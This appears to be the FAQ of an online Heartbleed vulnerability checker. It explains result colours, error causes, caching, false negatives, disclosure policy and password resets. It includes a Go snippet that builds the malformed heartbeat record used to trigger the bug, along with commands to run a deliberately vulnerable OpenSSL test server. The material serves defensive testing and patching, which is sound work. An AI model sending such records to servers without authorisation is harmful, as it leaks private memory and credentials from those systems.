My Twitter feed might be a good place to look for known issues.
This error means that I can't tell if the server is vulnerable (probably not). This might be because:

- "broken pipe", "connection reset by peer" and "timeout" errors are on the rise; they are probably counter-measures, firewalls and IPSes closing the connection or sink-holing it when they detect a heartbeat.
- "broken pipe" is also caused by unaffected IIS servers.
- "timeout" is apparently also caused by patched servers that don't respond to our "quit" message. This happens with a patched server, but it is not a green, since the same behavior might be caused by my servers being overloaded, so I can't be sure.
- "tls: oversized record received with length 20291" (and sometimes "EOF") means that the service uses STARTTLS, which I still need to implement. Use the command line tool meanwhile, with -service=ftp/imap/...
- "connection refused" and "timeout" can also simply mean that my servers are under too heavy load.
Here it is! By @mightyshakerjnr: Chromebleed.
And for Firefox: FoxBleed.
If you are getting consistent reds (3 or more in a row; if you see just one, it MIGHT be a glitch), I'm 100% certain that the host you are passing me is vulnerable, right now. (Please note that I'm now caching results for 1 hour.)
Common causes include (got them from Twitter, mail or here):

- the service being linked against a bundled "openssl" and not the system "libssl"
- "mod_spdy", which uses a backported OpenSSL
- control panels running their own web server; try "service sw-cp-server restart" after updating
Yes, for 1 hour. The cache key is service + host + the Advanced checkbox. AWS DynamoDB, in case you were wondering. Contributed initially by Mozilla.
No, there are no caches other than the one of your browser, and that should not be involved. Getting a red is simply a really quick process.
Yes, when you hit the button I actually go to the site, send it a malformed heartbeat and extract ~80 bytes of memory as proof, just like an attacker would. I don't check versions or make assumptions; I look for the bug.
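For reference, the widely published proof-of-concept heartbeat record (per RFC 6520) claims a large payload_length while carrying no payload at all; the exact lengths my tool asks for may differ. This sketch only constructs the bytes, it doesn't talk to any server:

```go
package main

import "fmt"

// malformedHeartbeat builds the classic Heartbleed test record: the
// record claims a 0x4000-byte payload but carries none, so a vulnerable
// OpenSSL echoes back up to 16 KB of process memory.
func malformedHeartbeat() []byte {
	return []byte{
		0x18,       // TLS record type: heartbeat
		0x03, 0x02, // TLS version 1.1
		0x00, 0x03, // record length: only 3 bytes follow
		0x01,       // HeartbeatMessageType: heartbeat_request
		0x40, 0x00, // claimed payload_length: 16384 -- but no payload is sent
	}
}

func main() {
	fmt.Printf("% x\n", malformedHeartbeat()) // prints: 18 03 02 00 03 01 40 00
}
```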
There used to be a bug that under load caused timeouts to be interpreted as greens. This should not be the case anymore.
If it's still the case please contact me on Twitter specifying the hostname and time.
Be careful: unless you glitched the tool by hammering the button, there is no way I can think of that a red is not a red.
Check the memory dump; if it's there, then the tool got it from somewhere.
Let's say I'm 99% certain that you should take a closer look at whether you really restarted all processes after updating correctly.
Update: still, I'm consistently getting reports of unaffected versions going red once, maybe twice at most; if it happens repeatedly, the site IS vulnerable.
Please comment on the issue if you are affected. I'm looking for 3 things: memory dumps (to figure out where they came from), timestamps (as accurate as possible; try the Network tab), and a complete description of what you clicked and typed.
Yes and yes, get yourself a copy of Go 1.2 and head to GitHub.
I don't think this would be responsible. People are trusting me with bits of their infrastructure information, and I think many trust me not to disclose them. My plan is to release only anonymous, aggregated information for sites outside the Alexa top 1000 (because hey, I'm going to tell you if one of those took 24 hours to patch).
People are right to want to know if a compromise happened on a site they use, and I'm trying to figure out how to responsibly meet this need. If you have opinions on this, please ping me on Twitter.
I'm not gonna tell you how to extract more memory or what to do with it, sorry.
That's true. Unfortunately, there is no real way to check if a certificate has been re-keyed without comparing it to the previous one (a certificate can be re-keyed without the dates being updated, and many CAs are doing this). The ZMap people did that the right way.
Moreover, the security risk of a patched server with an old cert is much lower: an attacker would need to be intercepting your traffic to take advantage of it. So I feel that the priority now is getting users to change passwords that might have been leaked to the whole world, not just to a really skilled roommate, their malicious ISP or the NSA (these three being the few that can probably MiTM you).
It's the site owners' responsibility to tell users what was done to handle the issue and when to change their passwords. Also, site owners: please invalidate all user passwords and ask for them to be reset via email on first login; it's the responsible thing to do.
Be my guest: ec2-54-81-196-192.compute-1.amazonaws.com:4433. Don't be evil ;)
So you guys knocked this down too. I'll publish an AMI; meanwhile, this will open up port 4433 (make sure you have a vulnerable OpenSSL; the latest Ubuntu EC2 image is fine):

openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout mycert.pem -out mycert.pem
openssl s_server -cert mycert.pem -www
By the way, I use cloudflarechallenge.com for testing.
This is a completely safe test, and will do nothing to your systems if you have patched. Please patch.
Here is a list of the machine hosts and IPs. Please don't file Abuse reports, okay? <3
Oh snap! Contact me on Twitter or open an issue on GitHub.
If you are reporting a bug or some unsupported service, please provide hostnames, memory dumps, exact errors...
Load issues (probably) caused many connections to the tested servers to fail randomly and report a FALSE NEGATIVE (green).
Repeated tests will eventually yield a red. A red result takes precedence over all the others and is certain: you are given a sample of live server memory as proof.
I'm very sorry about this. I'm spinning up more machines as a quick fix, and then rewriting the test to only report a green on positive confirmation.
Meanwhile, you can use the command line tool, which is completely unaffected.